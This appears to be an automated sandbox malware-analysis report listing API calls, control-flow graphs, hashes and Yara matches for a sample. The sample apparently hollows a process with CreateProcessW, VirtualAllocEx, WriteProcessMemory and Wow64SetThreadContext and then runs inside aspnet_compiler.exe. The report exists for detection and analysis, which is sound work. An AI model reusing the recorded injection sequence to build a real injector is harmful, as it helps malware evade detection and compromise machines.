                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:09:44:04
                                                    Start date:11/09/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6d20e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:31.1%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:31
                                                      Total number of Limit Nodes:1
                                                      execution_graph 2958 17e578c 2959 17e5790 CreateProcessW 2958->2959 2961 17e598c 2959->2961 2961->2961 2930 17e5b18 2931 17e5b8b Wow64SetThreadContext 2930->2931 2932 17e5b76 2930->2932 2933 17e5bd4 2931->2933 2932->2931 2934 17e5798 2935 17e5825 CreateProcessW 2934->2935 2937 17e598c 2935->2937 2937->2937 2938 17e5c28 2939 17e5c29 ReadProcessMemory 2938->2939 2940 17e5ce7 2939->2940 2941 17e5e48 2942 17e5e49 WriteProcessMemory 2941->2942 2944 17e5f28 2942->2944 2947 17e5d38 2948 17e5d40 VirtualAllocEx 2947->2948 2949 17e5df7 2948->2949 2945 17e5d40 VirtualAllocEx 2946 17e5df7 2945->2946 2950 17e5c20 2951 17e5c29 ReadProcessMemory 2950->2951 2952 17e5c24 2950->2952 2953 17e5ce7 2951->2953 2952->2951 2954 17e5b10 2955 17e5b18 Wow64SetThreadContext 2954->2955 2957 17e5bd4 2955->2957 2962 17e5e40 2963 17e5e44 WriteProcessMemory 2962->2963 2965 17e5f28 2963->2965

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f2074460590b59bbfee6c03c74c363854f818476e55aca32f5d75aea6aa544d4
                                                      • Instruction ID: be4f00e73c7571e3b279f4cca88b3f21f148daf4827a471a9364afe79682800b
                                                      • Opcode Fuzzy Hash: f2074460590b59bbfee6c03c74c363854f818476e55aca32f5d75aea6aa544d4
                                                      • Instruction Fuzzy Hash: F6A2AF74E0522A8FDBA5DF68C988BDDBBF5AB49300F5081EAD50DA7251DB349E80CF50

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0198a72a17ca082b8e0cbc2a742a3b71f76d78ff802f195addd7170b1cdef7f
                                                      • Instruction ID: 275bebae43c7e114730ea380660f93f628ccbb31748ea68259d906a8df163a68
                                                      • Opcode Fuzzy Hash: e0198a72a17ca082b8e0cbc2a742a3b71f76d78ff802f195addd7170b1cdef7f
                                                      • Instruction Fuzzy Hash: A982AF74E0522A8FDB65DF68C998BEDBBF5AB89300F5081EAD50DA7251DB305E80CF50

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d5f9424131a99713b5fa70e5ef768004c1b92a89ec2f21b036a64752e0758f2
                                                      • Instruction ID: 794d5f9168971d2df10484966cb3d36c0e18eb2462d688f73e483be3000d0842
                                                      • Opcode Fuzzy Hash: 0d5f9424131a99713b5fa70e5ef768004c1b92a89ec2f21b036a64752e0758f2
                                                      • Instruction Fuzzy Hash: 54528174A012198FEB64CF69D988B99BBF1FF49310F1481E9E909A7365DB309E84CF50

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b867f7be5a3998d3f5149d0eeff45d607d54bbf9c463234ae02b2e50989bddb6
                                                      • Instruction ID: 0fcb90c7029d13d8aecf1b494a8a83a2a078512203e954032592eb8518e745f5
                                                      • Opcode Fuzzy Hash: b867f7be5a3998d3f5149d0eeff45d607d54bbf9c463234ae02b2e50989bddb6
                                                      • Instruction Fuzzy Hash: F2428274A01219CFDB64CF69D984B99BBF1BF49310F1091EAE909A7365DB309E85CF10

                                                      Control-flow Graph

                                                      control_flow_graph 0 17e578c-17e578e 1 17e5795-17e5823 0->1 2 17e5790-17e5793 0->2 4 17e583a-17e5848 1->4 5 17e5825-17e5837 1->5 2->1 6 17e585f-17e589b 4->6 7 17e584a-17e585c 4->7 5->4 8 17e58af-17e598a CreateProcessW 6->8 9 17e589d-17e58ac 6->9 7->6 13 17e598c-17e5992 8->13 14 17e5993-17e5a5c 8->14 9->8 13->14 23 17e5a5e-17e5a87 14->23 24 17e5a92-17e5a9d 14->24 23->24 27 17e5a9e 24->27 27->27
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 017E5977
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 250f48065a3d5e81abb0f507fce334edd6f7d598e3a9e607a0fb137ca51f449f
                                                      • Instruction ID: 06161e45d1c3e06819c51a9e3b4ef3d5da2770df2a72704d10e256d3aa2984f0
                                                      • Opcode Fuzzy Hash: 250f48065a3d5e81abb0f507fce334edd6f7d598e3a9e607a0fb137ca51f449f
                                                      • Instruction Fuzzy Hash: F281CE75C0022DDFDB25CFA9D884BDEBBF5AB09304F0490AAE548B7220DB709A85CF54

                                                      Control-flow Graph

                                                      control_flow_graph 29 17e5798-17e5823 30 17e583a-17e5848 29->30 31 17e5825-17e5837 29->31 32 17e585f-17e589b 30->32 33 17e584a-17e585c 30->33 31->30 34 17e58af-17e598a CreateProcessW 32->34 35 17e589d-17e58ac 32->35 33->32 39 17e598c-17e5992 34->39 40 17e5993-17e5a5c 34->40 35->34 39->40 49 17e5a5e-17e5a87 40->49 50 17e5a92-17e5a9d 40->50 49->50 53 17e5a9e 50->53 53->53
                                                      APIs
                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 017E5977
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 81bb4bc8ab12f6a97d31d5a20e9280035c678711112232ed92b68b210bb25ac5
                                                      • Instruction ID: 3dbfa035f52a885da836648ad085c5d5a258c65152d36d42cf1388d0f0d7ef2d
                                                      • Opcode Fuzzy Hash: 81bb4bc8ab12f6a97d31d5a20e9280035c678711112232ed92b68b210bb25ac5
                                                      • Instruction Fuzzy Hash: 7781BE74C0022DDFDB25CFA9D984BDEBBF5AB49304F0090AAE549B7220DB709A85DF54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 55 17e5e40-17e5e42 56 17e5e49-17e5eaf 55->56 57 17e5e44-17e5e48 55->57 59 17e5ec6-17e5f26 WriteProcessMemory 56->59 60 17e5eb1-17e5ec3 56->60 57->56 61 17e5f2f-17e5f6d 59->61 62 17e5f28-17e5f2e 59->62 60->59 62->61
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 017E5F16
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: f0aa22a0b4e197d9ecbc17dab9be2be8868f4347a9daf295c03b4eacaa658288
                                                      • Instruction ID: 0f3ddd270ab483e731ef7e53b9bf685cf35eaae2d1b63bb732cbbf49169c9c6f
                                                      • Opcode Fuzzy Hash: f0aa22a0b4e197d9ecbc17dab9be2be8868f4347a9daf295c03b4eacaa658288
                                                      • Instruction Fuzzy Hash: 75417BB9D04258DFCB10CFA9D984ADEFBF1BB09314F24906AE818B7210D375AA45CF54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 65 17e5e48-17e5eaf 67 17e5ec6-17e5f26 WriteProcessMemory 65->67 68 17e5eb1-17e5ec3 65->68 69 17e5f2f-17e5f6d 67->69 70 17e5f28-17e5f2e 67->70 68->67 70->69
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 017E5F16
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 29f8f8258923fbafa60c725a80f3b4aaf6fa507d1cd47e78064cefd3602f3ecf
                                                      • Instruction ID: 147a0648d101f39c2bdf41e934f0ca4826e176b191b20cdbfaa029b37cea5619
                                                      • Opcode Fuzzy Hash: 29f8f8258923fbafa60c725a80f3b4aaf6fa507d1cd47e78064cefd3602f3ecf
                                                      • Instruction Fuzzy Hash: 914189B9D04258DFCB00CFA9D984ADEFBF1BB09314F24902AE818B7210D375AA45CF64

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 73 17e5c20-17e5c22 74 17e5c29-17e5ce5 ReadProcessMemory 73->74 75 17e5c24 73->75 76 17e5cee-17e5d2c 74->76 77 17e5ce7-17e5ced 74->77 75->74 77->76
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 017E5CD5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: ee8df2b68277e874f5de3e23517b34161651c65f2974dd9b9f593bf5b00de534
                                                      • Instruction ID: 39659c38082ca8d5affb8c9dabf837c6a3ec654a3991acdf1b8538580864ef0c
                                                      • Opcode Fuzzy Hash: ee8df2b68277e874f5de3e23517b34161651c65f2974dd9b9f593bf5b00de534
                                                      • Instruction Fuzzy Hash: B34187B9D042589FCF10CFAAD984ADEFBF1BB19314F14906AE814B7210C375A945CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 80 17e5c28-17e5ce5 ReadProcessMemory 82 17e5cee-17e5d2c 80->82 83 17e5ce7-17e5ced 80->83 83->82
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 017E5CD5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: a7b4a9062d2c11d762b5894cc306dd68a9efa531ce4c2c4e2323ce8ec453c65c
                                                      • Instruction ID: e6806176445b159ad8123062b77b7d12a3fddb6643033f77df8a671d75d31e9e
                                                      • Opcode Fuzzy Hash: a7b4a9062d2c11d762b5894cc306dd68a9efa531ce4c2c4e2323ce8ec453c65c
                                                      • Instruction Fuzzy Hash: 063174B9D042589FCB10CFAAD984ADEFBF1BB19314F10A06AE814B7210D375A945CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 86 17e5d38-17e5d3b 87 17e5d40-17e5df5 VirtualAllocEx 86->87 88 17e5dfe-17e5e34 87->88 89 17e5df7-17e5dfd 87->89 89->88
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 017E5DE5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 28d5da45f94677b10d337ba373ce77e054918d1f42d92ed35942bbd7d7c3b782
                                                      • Instruction ID: 006170de5b34a4ba0d3d089ccdbf69a8c14d9b913e76cb71776d0170b633bf1b
                                                      • Opcode Fuzzy Hash: 28d5da45f94677b10d337ba373ce77e054918d1f42d92ed35942bbd7d7c3b782
                                                      • Instruction Fuzzy Hash: 843176B9D04258AFCB10CFA9D884A9EFBF5AB19314F10A01AE814B7310D375A945CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 92 17e5d40-17e5df5 VirtualAllocEx 93 17e5dfe-17e5e34 92->93 94 17e5df7-17e5dfd 92->94 94->93
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 017E5DE5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 24a4c75ea926fa1b69a48de12e35ad94b21b88c3f194befd886bb915aa73401f
                                                      • Instruction ID: 04c743811a4ebb6ffa9a2254046eb27be43294351c9c2531f4578ec476ee9da5
                                                      • Opcode Fuzzy Hash: 24a4c75ea926fa1b69a48de12e35ad94b21b88c3f194befd886bb915aa73401f
                                                      • Instruction Fuzzy Hash: 6C3184B8D042589FCF10CFA9E884A9EFBF5AB09310F10A02AE814BB310D375A945CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 97 17e5b10-17e5b74 99 17e5b8b-17e5bd2 Wow64SetThreadContext 97->99 100 17e5b76-17e5b88 97->100 101 17e5bdb-17e5c13 99->101 102 17e5bd4-17e5bda 99->102 100->99 102->101
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 017E5BC2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 3a10a51c59c4afa55d12d801cbcd2c8535c6e45b36452c0d31749e3697b9a583
                                                      • Instruction ID: 007b97ab709ba710d09520f53c90bf0a21fe76eda281c1bf9a9a6d919563e967
                                                      • Opcode Fuzzy Hash: 3a10a51c59c4afa55d12d801cbcd2c8535c6e45b36452c0d31749e3697b9a583
                                                      • Instruction Fuzzy Hash: 0631ABB4D012589FCB14CFAAD984ADEFBF1BB09314F24906AE814B7350D374A945CF64

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 105 17e5b18-17e5b74 106 17e5b8b-17e5bd2 Wow64SetThreadContext 105->106 107 17e5b76-17e5b88 105->107 108 17e5bdb-17e5c13 106->108 109 17e5bd4-17e5bda 106->109 107->106 109->108
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 017E5BC2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: ae9b66e5936de8a9de950c892f74dba04fe8e98ec1d31a613c8896a447efea5c
                                                      • Instruction ID: 02811d4aca98875050d6327d36abc54b19aaa99dae4928533a508da2ff730f01
                                                      • Opcode Fuzzy Hash: ae9b66e5936de8a9de950c892f74dba04fe8e98ec1d31a613c8896a447efea5c
                                                      • Instruction Fuzzy Hash: FE31AAB8D012589FCB14CFAAD884ADEFBF1BB08314F24802AE414B7210C378A945CF64
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3319163856.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_16ed000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8476cd645ac4e1c75e6a194e19e5f30c93f79c845f0271bc8c3a2e24e3801cba
                                                      • Instruction ID: 87faf846925bcac55290273369f7e399fe0e5d9b020b5edeb2233ae69db4adf0
                                                      • Opcode Fuzzy Hash: 8476cd645ac4e1c75e6a194e19e5f30c93f79c845f0271bc8c3a2e24e3801cba
                                                      • Instruction Fuzzy Hash: 0621F872505244EFDB15DF94DDC8B16BBA5FB88324F24C769EA050F246C336D416CBA2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3319163856.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_16ed000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0bbd8854ea923840acf4f22191579eb3b725da890e88cb42a0af1176dfa26e5d
                                                      • Instruction ID: a9ec09647e302dc40a464fa6c6761269a86fb8c9ee773bb67c43b1e4d1b7ae57
                                                      • Opcode Fuzzy Hash: 0bbd8854ea923840acf4f22191579eb3b725da890e88cb42a0af1176dfa26e5d
                                                      • Instruction Fuzzy Hash: 63219D76504280DFCB06CF54D9C4B16BFA2FB88324F24C6A9D9090A656C33AD456CBA2

                                                      Execution Graph

                                                      Execution Coverage:1.2%
                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                      Signature Coverage:8.1%
                                                      Total number of Nodes:135
                                                      Total number of Limit Nodes:9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 112 417233-41725c call 42ee93 115 417262-417270 call 42f493 112->115 116 41725e-417261 112->116 119 417280-417291 call 42d833 115->119 120 417272-41727d call 42f733 115->120 125 417293-4172a7 LdrLoadDll 119->125 126 4172aa-4172ad 119->126 120->119 125->126
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172A5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: e16a34ff752e58ab3819758e70589ed3c0c4bade0b9e16962d66035ee37cb21f
                                                      • Instruction ID: 4ebc492c990642ae82a12282fd151a353d3f1970f32c396ba538127b5767a14e
                                                      • Opcode Fuzzy Hash: e16a34ff752e58ab3819758e70589ed3c0c4bade0b9e16962d66035ee37cb21f
                                                      • Instruction Fuzzy Hash: 300152B1E0010DA7DB10DAE1DC42FDEB3B89B54308F0041A6F90897240F635EB498B55

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 146 42c0f3-42c12f call 4047a3 call 42d323 NtClose
                                                      APIs
                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C12A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction ID: defc0cc7c6ea004b891c9d4643a6f9115435f1e7ed272e3c7b044ec12ea88ae9
                                                      • Opcode Fuzzy Hash: 7fea8813780153429a3e2bc9ce62912ee225e97507eed709cacbc900be663fb2
                                                      • Instruction Fuzzy Hash: C3E0DF352002007BC610EE1ADC01F8B736CDBC2314F00401AFA4867141CA70790187A1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 160 1af2b60-1af2b6c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e0b2088d070ae7e6ba56f437aab096d46d2282297eaedcc1dc6655e75a02b7f4
                                                      • Instruction ID: 5c96aef408457ed280fd3883dcbc858769536541f53640441b60911387e76d72
                                                      • Opcode Fuzzy Hash: e0b2088d070ae7e6ba56f437aab096d46d2282297eaedcc1dc6655e75a02b7f4
                                                      • Instruction Fuzzy Hash: 0890026260280043410A71584414616440A97E0241B55C061E10145D5DC6258AD16225

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 162 1af2df0-1af2dfc LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e4ff844f74eb8889034fac977234c54372e0a7f8f8c16d5f7045a14561317ec9
                                                      • Instruction ID: 4625fd114ce2645afef411ebfb12b3f7908b2250e060b89d6289273c21162be5
                                                      • Opcode Fuzzy Hash: e4ff844f74eb8889034fac977234c54372e0a7f8f8c16d5f7045a14561317ec9
                                                      • Instruction Fuzzy Hash: 5E90023260180453D11671584504707040997D0281F95C452A042459DDD7568B92A221

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 161 1af2c70-1af2c7c LdrInitializeThunk
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d37cc8d9fca5d477c40688d7715fed5259d32aea2e4469be626d2ce555fa3794
                                                      • Instruction ID: e6f1855a17781af26dec0b15052c4fa04d9ddb72a5f43a98e355ae6150167d38
                                                      • Opcode Fuzzy Hash: d37cc8d9fca5d477c40688d7715fed5259d32aea2e4469be626d2ce555fa3794
                                                      • Instruction Fuzzy Hash: D790023260188842D1157158840474A040597D0341F59C451A442469DDC7958AD17221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 48663I1M$48663I1M$|:/,
                                                      • API String ID: 0-303600315

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(48663I1M,00000111,00000000,00000000), ref: 00413AEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 48663I1M$48663I1M
                                                      • API String ID: 1836367815-3275742752

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(48663I1M,00000111,00000000,00000000), ref: 00413AEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 48663I1M$48663I1M
                                                      • API String ID: 1836367815-3275742752

                                                      Control-flow Graph

                                                      control_flow_graph 127 4172ef-4172f5 128 4172f7-41731d 127->128 129 4172bf-4172c0 127->129 130 417281-417283 129->130 131 4172c2-4172ca 129->131 132 417289-417291 130->132 133 417284 call 42d833 130->133 134 417293-4172a7 LdrLoadDll 132->134 135 4172aa-4172ad 132->135 133->132 134->135
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:

                                                      Control-flow Graph

                                                      control_flow_graph 141 42c453-42c497 call 4047a3 call 42d323 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0010FC45,00000007,00000000,00000004,00000000,00416ABC,000000F4), ref: 0042C492
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0

                                                      Control-flow Graph

                                                      control_flow_graph 136 42c403-42c447 call 4047a3 call 42d323 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041E014,?,?,00000000,?,0041E014,?,?,?), ref: 0042C442
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_aspnet_compiler.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0

                                                      Control-flow Graph

                                                      control_flow_graph 151 42c4a3-42c4dc call 4047a3 call 42d323 ExitProcess
                                                      APIs
